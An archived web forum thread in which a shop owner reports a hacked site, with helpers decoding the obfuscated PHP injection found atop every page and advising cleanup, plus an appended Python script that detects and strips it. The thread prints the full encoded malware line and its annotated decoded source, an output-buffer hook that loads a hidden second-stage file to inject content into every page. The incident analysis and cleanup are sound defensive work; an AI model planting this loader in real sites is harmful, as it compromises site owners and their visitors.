
This topic is now archived and is closed to further replies.

ricardodacosta

I have been Hacked! Help Please!

I have this code at the top of all my pages:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ2ljY2hhaS9odG1sL2NhdGFsb2cveW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV9tY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ2ljY2hhaS9odG1sL2NhdGFsb2cveW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV9tY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>


1) What is it?

2) How was someone able to do that?

3) How can I delete it all at once without having to delete it from each file?

4) How can I prevent this from happening again?

 

Thank you for your help!

 

Ricardo


What is it? It's nasty, that's what. The actual code is below:

 

// Decoded payload. It installs an output-buffer hook so that whatever gml() returns
// is injected into every page the server sends.
if ( function_exists('ob_start') && !isset($GLOBALS['sh_no']) ) {
    $GLOBALS['sh_no'] = 1;   // run-once guard, so nested includes do not hook twice
    // Second stage: a PHP file hidden under a .css.php name inside the admin editor
    // tree. It has to define gml(), the function that builds the injected markup.
    if ( file_exists('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php') ) {
        include_once('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
        if ( function_exists('gml') && !function_exists('dgobh') ) {
            // Polyfill for gzdecode() on PHP builds that lack it: walk the gzip header
            // flags (FEXTRA=4, FNAME=8, FCOMMENT=16, FHCRC=2) to find the raw deflate data.
            if ( !function_exists('gzdecode') ) {
                function gzdecode($d) {
                    $f = ord(substr($d, 3, 1));   // FLG byte
                    $h = 10; $e = 0;              // fixed gzip header is 10 bytes
                    if ($f & 4) {                 // FEXTRA: 2-byte length + extra field
                        $e = unpack('v', substr($d, 10, 2));
                        $e = $e[1]; $h += 2 + $e;
                    }
                    if ($f & 8) {                 // FNAME: zero-terminated string
                        $h = strpos($d, chr(0), $h) + 1;
                    }
                    if ($f & 16) {                // FCOMMENT: zero-terminated string
                        $h = strpos($d, chr(0), $h) + 1;
                    }
                    if ($f & 2) {                 // FHCRC: 2-byte header CRC
                        $h += 2;
                    }
                    $u = gzinflate(substr($d, $h));
                    if ($u === FALSE) {
                        $u = $d;                  // not gzip after all: pass through
                    }
                    return $u;
                }
            }
            // Output-buffer callback: decompress the page if it was gzipped, then put
            // gml()'s output right after the <body> tag, or in front of everything.
            function dgobh($b) {
                Header('Content-Encoding: none');   // the body leaves uncompressed
                $c = gzdecode($b);
                if (preg_match('/\<body/si', $c)) {
                    return preg_replace('/(\<body[^\>]*\>)/si', '$1' . gml(), $c);
                } else {
                    return gml() . $c;
                }
            }
            ob_start('dgobh');   // every byte the page prints now passes through dgobh()
        }
    }
}


Robert, thanks for your reply. Could you tell me what to do now? Should I remove the inline popups file from the admin dir and then change my FTP password? Any other suggestion will be greatly appreciated.


I need to know how to clean that F#$@$ code out of all my files? Is there a way to do it at once or do I have to go one by one and delete the code?

 

Should I install Security Pro afterwards or before I start deleting the code, just in case it comes back again?

 

How was this hacker able to add that code to all my files?


See the reasons in the links above for the most likely ways in.

 

Set right the permissions on files and directories.

 

Restoring the site from a clean backup is the best solution; otherwise, edit every file and remove the offending code.




Usually people say that you have to install a clean backup (of the files) and, because chances are that the hacker will come back, you have to secure the site afterwards!


Ok guys, thank you for your help. I will upload the clean files from my backup and then add the Security Pro contribution as well as any others mentioned above.

 

Again Thanks!


This infection does the following:

- adds a gifimg.php (or similarly named file) to most/all of your image directories

- adds a javascript function to many index.htm or index.html files on your site

- adds a javascript function to many .js files on your site.

 

FYI.

 

-jared
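An added cleanup script for questions 1 and 3 in the first post (example code, not from this thread or from osCommerce): it finds the <?php /**/eval(base64_decode('...')); ?> prefix quoted above, decodes the payload for review, strips it from each file while keeping a .bak copy, and flags the gifimg.php dropper jared lists. The sample page and payload are constructed, the function names and the scanned extensions are my own choices, and the script should be run with dry_run=True first.

```python
import base64
import os
import re
import shutil
import tempfile

INJECT_RE = re.compile(r"<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=\s]+)'\)\);\s*\?>")

SAMPLE_PAYLOAD = "echo 'constructed sample';"  # constructed, not the thread's real payload
SAMPLE_PAGE = ("<?php /**/eval(base64_decode('" + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
               + "')); ?>\n<html><body>Hello</body></html>\n")

def clean_text(text):
    """Return (cleaned_text, decoded_payload); payload is None if no injection was found."""
    m = INJECT_RE.search(text)
    if m is None:
        return text, None
    decoded = base64.b64decode(re.sub(r"\s+", "", m.group(1))).decode("latin-1")
    return text[:m.start()] + text[m.end():].lstrip("\r\n"), decoded

def clean_tree(root, exts=(".php", ".html", ".htm", ".js"), dry_run=True):
    """List injected files and dropped gifimg.php under root; dry_run=False also strips injections."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == "gifimg.php":  # dropper file named in jared's post
                findings.append((path, "dropped file"))
            elif name.lower().endswith(exts):
                with open(path, encoding="latin-1") as fh:  # latin-1 round-trips raw bytes
                    cleaned, decoded = clean_text(fh.read())
                if decoded is not None:
                    findings.append((path, decoded))
                    if not dry_run:
                        shutil.copy2(path, path + ".bak")  # keep the original for forensics
                        with open(path, "w", encoding="latin-1") as fh:
                            fh.write(cleaned)
    return findings

def demo():
    """Build a throwaway tree holding the constructed sample, clean it, return what was found."""
    root = tempfile.mkdtemp()
    for rel, body in [("index.php", SAMPLE_PAGE), ("gifimg.php", "<?php ?>")]:
        with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
            fh.write(body)
    kinds = sorted(k for _, k in clean_tree(root, dry_run=False))
    with open(os.path.join(root, "index.php"), encoding="latin-1") as fh:
        cleaned = fh.read()
    shutil.rmtree(root)
    return kinds, cleaned
```

Restoring from a clean backup, as advised above, is still the safer route: this only removes the prefix shown in this thread and leaves the included style.css.php loader in place, which has to be deleted separately.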
